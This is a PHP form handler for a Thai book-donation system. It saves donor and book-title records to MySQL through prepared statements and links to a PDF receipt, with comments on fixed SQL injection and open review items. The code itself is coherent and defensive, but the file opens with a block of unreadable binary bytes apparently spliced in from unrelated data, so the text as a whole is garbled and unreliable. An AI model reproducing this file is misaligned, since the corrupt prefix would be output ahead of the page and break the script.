h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
<?ob_start();?>
<?php include 'dbconnect.php';?>
<?php include 'header.php';?>
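<?php
/*
 * Handles the submitted give-book form: stores one donor row in givebook_detail
 * and one title_detail row per completed book line, then prints the outcome.
 *
 * Uses two names that are not defined in this file and presumably come from the
 * includes above -- confirm against dbconnect.php / header.php:
 *   $conn            mysqli link passed to every query
 *   $max_num_titles  number of book rows the form can submit
 *
 * Security notes:
 *  - Every request value reaches SQL only as a bound parameter of a prepared
 *    statement. The previous version concatenated $_POST values into the SQL
 *    text, which let a submitted field change the statement itself.
 *  - prefix_id, worktype_id and amount were interpolated unquoted, so they are
 *    treated as non-negative integers and rejected otherwise.
 *    NOTE(review): confirm the column types against the schema.
 *  - NOTE(review): no authentication or CSRF check is visible in this file;
 *    confirm that header.php or the form page enforces them.
 */
if (!empty($_POST["submit"]))
{
	$checkbox_width = 6;
	$checkbox_height = 6;

	// A missing or non-string (array) field counts as empty, so it can never be
	// coerced to the literal "Array" and stored.
	$givebook_number = (isset($_POST["givebook_number"]) && is_string($_POST["givebook_number"])) ? $_POST["givebook_number"] : '';
	$prefix_id = (isset($_POST["prefix_id"]) && is_string($_POST["prefix_id"])) ? $_POST["prefix_id"] : '';
	$firstname = (isset($_POST["firstname"]) && is_string($_POST["firstname"])) ? $_POST["firstname"] : '';
	$lastname = (isset($_POST["lastname"]) && is_string($_POST["lastname"])) ? $_POST["lastname"] : '';
	$giver_organization = (isset($_POST["giver_organization"]) && is_string($_POST["giver_organization"])) ? $_POST["giver_organization"] : '';
	$phone = (isset($_POST["phone"]) && is_string($_POST["phone"])) ? $_POST["phone"] : '';
	$email = (isset($_POST["email"]) && is_string($_POST["email"])) ? $_POST["email"] : '';

	if (($prefix_id !== '') && ($firstname !== '') && ($lastname !== '') && ($phone !== '') && ($email !== '') && ($giver_organization !== '')) {
		// \A...\z rather than ^...$ so a trailing newline is not accepted.
		$digits_only = '/\A[0-9]+\z/';

		// Collect every completed book row once; at least one is required.
		$title_rows = array();
		$current_title = 1;
		while ($current_title <= $max_num_titles)
		{
			$title_name_form_name = "title_name" . $current_title;
			$author_form_name = "author" . $current_title;
			$worktype_id_form_name = "worktype_id" . $current_title;
			$amount_form_name = "amount" . $current_title;
			$title_name = (isset($_POST[$title_name_form_name]) && is_string($_POST[$title_name_form_name])) ? $_POST[$title_name_form_name] : '';
			$author = (isset($_POST[$author_form_name]) && is_string($_POST[$author_form_name])) ? $_POST[$author_form_name] : '';
			$worktype_id = (isset($_POST[$worktype_id_form_name]) && is_string($_POST[$worktype_id_form_name])) ? $_POST[$worktype_id_form_name] : '';
			$amount = (isset($_POST[$amount_form_name]) && is_string($_POST[$amount_form_name])) ? $_POST[$amount_form_name] : '';
			if (($title_name !== '') && ($author !== '') && ($worktype_id !== '') && ($amount !== '')) {
				$title_rows[] = array(
					'title_name' => $title_name,
					'author' => $author,
					'worktype_id' => $worktype_id,
					'amount' => $amount,
				);
			}
			$current_title += 1;
		}
		$title_ok = (count($title_rows) > 0) ? 1 : 0;

		if ($title_ok == 1) {
			$query = false;
			$new_givebook_id = 0;

			if (preg_match($digits_only, $prefix_id)) {
				// Find the next givebook_id (highest existing id + 1, or 1 for an empty table).
				// NOTE(review): this allocation is not atomic; two concurrent submissions can
				// compute the same id. An auto-increment key would remove the race, but the
				// schema is not visible here.
				$lookup = mysqli_query($conn, "SELECT givebook_id FROM givebook_detail ORDER BY givebook_id DESC LIMIT 1");
				if ($lookup) {
					if ($result = mysqli_fetch_array($lookup, MYSQLI_ASSOC)) {
						$new_givebook_id = $result["givebook_id"] + 1;
					} else {
						$new_givebook_id = 1;
					}
					mysqli_free_result($lookup);

					// Save the donor row to givebook_detail.
					$sql = "INSERT INTO givebook_detail ";
					$sql .= "(givebook_id,givebook_number,prefix_id,firstname,lastname,giver_organization,phone,email) ";
					$sql .= "VALUES (?,?,?,?,?,?,?,?)";
					$donor_stmt = mysqli_prepare($conn, $sql);
					if ($donor_stmt) {
						$prefix_id_value = (int) $prefix_id;
						mysqli_stmt_bind_param(
							$donor_stmt,
							'isisssss',
							$new_givebook_id,
							$givebook_number,
							$prefix_id_value,
							$firstname,
							$lastname,
							$giver_organization,
							$phone,
							$email
						);
						$query = mysqli_stmt_execute($donor_stmt);
						mysqli_stmt_close($donor_stmt);
					}
				}
			}

			if ($query)
			{
				// Save each completed book row to title_detail. The statement is prepared
				// once; the bound variables are reassigned before every execute.
				$sql = "INSERT INTO title_detail ";
				$sql .= "(givebook_id,title_name,author,worktype_id,amount) ";
				$sql .= "VALUES (?,?,?,?,?)";
				$title_stmt = mysqli_prepare($conn, $sql);
				$bound_title_name = '';
				$bound_author = '';
				$bound_worktype_id = 0;
				$bound_amount = 0;
				if ($title_stmt) {
					mysqli_stmt_bind_param(
						$title_stmt,
						'issii',
						$new_givebook_id,
						$bound_title_name,
						$bound_author,
						$bound_worktype_id,
						$bound_amount
					);
				}

				foreach ($title_rows as $title_row) {
					$row_saved = false;
					if ($title_stmt
						&& preg_match($digits_only, $title_row['worktype_id'])
						&& preg_match($digits_only, $title_row['amount'])
					) {
						$bound_title_name = $title_row['title_name'];
						$bound_author = $title_row['author'];
						$bound_worktype_id = (int) $title_row['worktype_id'];
						$bound_amount = (int) $title_row['amount'];
						$row_saved = mysqli_stmt_execute($title_stmt);
					}
					if (!$row_saved) {
						echo "ไม่สามารถบันทึกข้อมูลได้";
					}
				}

				if ($title_stmt) {
					mysqli_stmt_close($title_stmt);
				}
?>
	<BR />บันทึกข้อมูลเรียบร้อยแล้ว
	<BR /><BR /><a href="generatepdf.php?givebook_id=<?php echo (int) $new_givebook_id;?>" target="_blank"><button type="button" class="btn-success">คลิกที่นี่เพื่อพิมพ์หนังสือตอบรับ</button></a>
<?php
			} else { // donor row was not saved
				echo "ไม่สามารถบันทึกข้อมูลได้";
			}
		} else { // no completed book row
?>
	<BR />กรุณากรอกข้อมูลหนังสือ
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php
		}
	} else { // a required donor field is empty
?>	
	<BR />กรุณากรอกข้อมูลให้ครบถ้วน
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
	</div>		
<?php
	}
}
?>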

<?php include 'footer.php';?>
